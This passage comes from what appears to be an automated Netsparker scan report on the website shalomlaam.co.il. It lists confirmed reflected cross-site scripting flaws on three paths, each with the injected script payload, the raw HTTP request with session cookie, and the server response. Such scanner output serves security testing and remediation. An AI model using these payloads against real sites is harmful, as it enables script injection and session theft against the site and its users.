3.65. /page/odot/'%22-%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%3C/script%3E CONFIRMED http://www.shalomlaam.co.il/page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%..
Parameters Parameter
Type
Value
URI-BASED
Full URL
'"--></style></script> <script>alert(0x0004E2)</script>
Request GET /page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E2)%3C/script%3E HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.shalomlaam.co.il Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA Accept-Encoding: gzip, deflate
Response HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Date: Tue, 20 May 2014 14:03:44 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 170 Pragma: no-cache Expires: Tue, 01 Jan 1971 02:00:00 GMT 404;http://www.shalomlaam.co.il:80/page/odot/'"--></style></script><script>netsparker(0x0004E2)</script><BR>script><BR>style><<script>netsparker(0x0004E2)<.asp?id=script>
3.66. /about/search/ CONFIRMED http://www.shalomlaam.co.il/about/search/?'"--></style></script><script>alert(0x000534)</script>
Parameters Parameter
Type
Value
Query Based
Query String
'"--></style></script> <script>alert(0x000534)</script>
Request GET /about/search/?'"--></style></script><script>netsparker(0x000534)</script> HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.shalomlaam.co.il Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA Accept-Encoding: gzip, deflate
Response HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Date: Tue, 20 May 2014 14:04:12 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 174 Pragma: no-cache Expires: Tue, 01 Jan 1971 02:00:00 GMT 404;http://www.shalomlaam.co.il:80/about/search/?'"--></style></script><script>netsparker(0x000534)</script><BR>script><BR>style><<script>netsparker(0x000534)<.asp?id=script>
3.67. /reg/maillingUpdate.asp'%22-%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D5)%3C/script%3E CONFIRMED http://www.shalomlaam.co.il/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters Parameter
Type
Value
URI-BASED
Full URL
'"--></style></script> <script>alert(0x0001D5)</script>
52 / 146